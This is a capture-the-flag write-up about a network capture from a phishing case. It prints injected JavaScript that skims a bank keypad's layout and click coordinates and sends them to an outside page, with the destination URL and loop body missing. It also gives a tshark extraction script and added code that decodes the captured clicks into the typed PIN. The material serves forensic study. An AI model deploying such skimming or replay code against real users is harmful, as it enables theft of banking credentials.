The police have arrested a cyber criminal but they don’t have a good witness. Just a short capture of his network traffic is available. Is it helpful?

A pcap network traffic log is attached. Opening it in Wireshark shows that an email was sent with a link to this page, which injects the following JavaScript code into the page.

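function sendmap(){
  var buttons=document.getElementsByClassName("keypadButtonStyle");
  var keymap="";
  for(var i=0;i<buttons.length;i++){
    // loop body missing from the page; per the text below it builds the key map
  }
  var xmlhttp=new XMLHttpRequest();
  // destination URL missing from the page
  xmlhttp.open("GET",""+keymap,false);
  xmlhttp.send();
}
function clickdone(e){
  var xPosition=e.clientX;
  var yPosition=e.clientY;
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.open("GET",""+xPosition+","+yPosition,false);
  xmlhttp.send();
}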

It first sends the mapping of keys to

then on each click sends the x and y position of the click to that page.

We used the following shell script to find all GET requests to the given address.


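#!/bin/bash
touch bank-followstream.txt
# Highest TCP stream index in the capture passed as $1
END=$(tshark -r "$1" -T fields -e tcp.stream | sort -n | tail -1)
# Append the ASCII dump of every TCP stream to one file
for ((i=0;i<=END;i++)); do
     echo $i
     tshark -r "$1" -qz follow,tcp,ascii,$i >> bank-followstream.txt
done

# Requests that carry the key map and the click coordinates
grep "GET /c.php" < bank-followstream.txt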

The key mapping is 4 1 6 3 7 0 8 9 5 2 Backspace. With a few lines of JavaScript you can simulate the captured clicks on the original page. After logging in, the flag will appear.
This line of JavaScript (using jQuery) may be helpful:

$(document.elementFromPoint(x, y)).click();
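
An added example (not code from the original write-up) that turns the grep output into the typed key sequence instead of replaying clicks by hand: it parses the click requests, finds the keypad button under each coordinate, and translates the button position through the captured key map. The `?p=` parameter name in the sample lines, the function names, and the assumption that the key map is listed in the DOM order of the `keypadButtonStyle` buttons are not from the page.

```javascript
// Key order from the captured key-map request (index = button position, assumed).
const KEYMAP = ["4", "1", "6", "3", "7", "0", "8", "9", "5", "2", "Backspace"];

// Constructed sample in the shape of the grep output; the "?p=" parameter
// name is an assumption, the page does not show the query string.
const SAMPLE_LINES = [
  "GET /c.php?p=30,20 HTTP/1.1",
  "GET /favicon.ico HTTP/1.1",
  "GET /c.php?p=90,20 HTTP/1.1",
];

// Extract {x, y} from each "GET /c.php...x,y" request line, in capture order.
// Requests carrying more than two comma-separated values (the key map) are skipped.
function parseClicks(lines) {
  const clicks = [];
  for (const line of lines) {
    const req = /^GET (\/c\.php\S*)/.exec(line.trim());
    if (!req) continue;
    const pair = /(?:^|[^\d,])(\d+),(\d+)$/.exec(req[1]);
    if (pair) clicks.push({ x: Number(pair[1]), y: Number(pair[2]) });
  }
  return clicks;
}

// Map each click to the keypad button under it, then to the captured key.
// doc must be the keypad page at the same viewport size and scroll position as
// in the capture, because clientX/clientY are viewport-relative.
function recoverKeys(doc, clicks, keymap) {
  const buttons = Array.from(doc.getElementsByClassName("keypadButtonStyle"));
  const keys = [];
  for (const { x, y } of clicks) {
    let el = doc.elementFromPoint(x, y);
    // The hit element may be a child of the button; walk up to the button.
    while (el && !buttons.includes(el)) el = el.parentElement;
    if (!el) continue;                       // click outside the keypad
    const key = keymap[buttons.indexOf(el)];
    if (key === "Backspace") keys.pop();     // undo the previous key
    else if (key !== undefined) keys.push(key);
  }
  return keys;
}
```

In the browser console on the keypad page, `recoverKeys(document, parseClicks(lines), KEYMAP).join("")` gives the entered value, where `lines` holds the grep output split per line.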